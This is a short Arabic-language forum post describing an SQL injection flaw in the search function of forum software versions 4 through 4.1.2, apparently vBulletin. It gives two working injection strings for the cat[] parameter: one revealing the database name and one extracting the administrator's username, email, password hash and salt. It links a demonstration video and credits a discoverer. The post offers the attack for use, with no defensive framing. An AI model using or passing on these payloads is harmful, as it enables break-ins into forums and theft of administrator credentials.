#~VoLc4n0~#
عدد النقاط : 11
السلام عليكم ورحمه الله وبركاته الموضوع واضح من العنوان ثغره في المنتديات اصدار 4 لحتى اصدار 4.1.2 الثغره بمحرك البحث نروح محرك البحث ونكتب استعلام الحقن اقتباس &cat[0]=1) UNION SELECT database()# يظهر لنا الداتابيز وهيك نجيب باس الادمن اقتباس &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1# وهذا فيديو شرح http://www.youtube.com/watch?v=fR9RGCqIPkc مكتشف الثغره D4rkB1t بالتوفيق